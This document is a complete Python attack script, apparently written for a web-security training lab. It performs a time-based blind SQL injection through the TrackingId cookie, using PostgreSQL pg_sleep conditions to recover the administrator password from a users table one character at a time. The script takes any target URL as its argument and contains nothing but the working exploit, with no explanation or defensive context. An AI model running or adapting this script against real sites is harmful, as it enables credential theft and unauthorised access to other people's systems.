Blind Injection Sample Script
import sys
import requests
import urllib3
import urllib
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
def sqli_password(url):
password_extracted = ""
for i in range(1,21):
for j in range(32,126):
sql_payload = "' || (select case when (username='administrator' and ascii(substring(password,%s,1))='%s') then pg_sleep(10) else pg_sleep(-1) end from users)--" %(i,j)
sql_payload_encoded = urllib.parse.quote(sql_payload)
cookies = {'TrackingId': 'N9U1b0pBRm2A4TUP' + sql_payload_encoded, 'session': 'QDQ6w9c8kVejHXxHONeBM16uK6k8xOBW'}
r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)
if int(r.elapsed.total_seconds()) > 9:
password_extracted += chr(j)
sys.stdout.write('\r' + password_extracted)
sys.stdout.flush()
break
else:
sys.stdout.write('\r' + password_extracted + chr(j))
sys.stdout.flush()
def main():
if len(sys.argv) != 2:
print("(+) Usage: %s <url>" % sys.argv[0])
print("(+) Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
url = sys.argv[1]
print("(+) Retreiving administrator password...")
sqli_password(url)
if __name__ == "__main__":
main()
Last updated